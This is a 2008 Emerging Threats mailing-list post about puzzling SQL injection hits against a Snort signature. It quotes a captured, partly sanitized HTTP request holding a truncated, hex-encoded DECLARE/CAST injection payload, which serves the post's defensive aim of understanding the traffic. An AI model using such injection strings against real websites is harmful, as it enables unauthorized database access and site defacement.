[Emerging-Sigs] Interesting SQL Injection attempts
Matt Jonkman
jonkman at jonkmans.com
Tue May 13 13:41:28 EDT 2008
This sent in from someone that's got to remain anonymous. Anyone have
more info or theories?
----------
A week or so ago I started seeing a lot of hits on sid 2008175 WEB
Possible SQL Injection (varchar) from APNIC. Today, I'm seeing lots of
a broken variant (?) from more than one geo NIC with the first seen from
RIPE. It starts off the same as the 2008175 hits I've been monitoring
but is somehow truncated. It makes it as far as declaring the '@C
varchar(25' then has another (hex) 3 I assume should lead into a x35
(char 5) but is overlaid with http header.. Different user-agent info
also. Odd!!! xxx's denote sanitizing. Any ideas what is going on?
GET /xxxxx/apps/contact/xxx
xxx.asp?id=86&subcatid=62
;DECLARE%20 at S%20
NVARCHAR(4000);S
ET%20 at S=CAST(0x4
400450043004C004
1005200450020004
0005400200076006
1007200630068006
1007200280032003
500350029002C004
0004300200076006
1007200630068006
1007200280032003
5003www.xxxx.u
s HTTP/1.1..Acce
pt: text/html, a
pplication/xml;q
=0.9, applicatio
n/xhtml+xml, */*
;q=0.1..Accept-L
anguage: en-gb..
Accept-Encoding:
deflate..User-A
gent: Mozilla/5.
0 (Windows NT 5.
1; U; en; rv:1.8
.0) Gecko/200607
28 Firefox/1.5.0
Opera 9.25..Hos
t: www.xxxxx.us
..Connection: Cl
ose....
--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc
More information about the Emerging-sigs
mailing list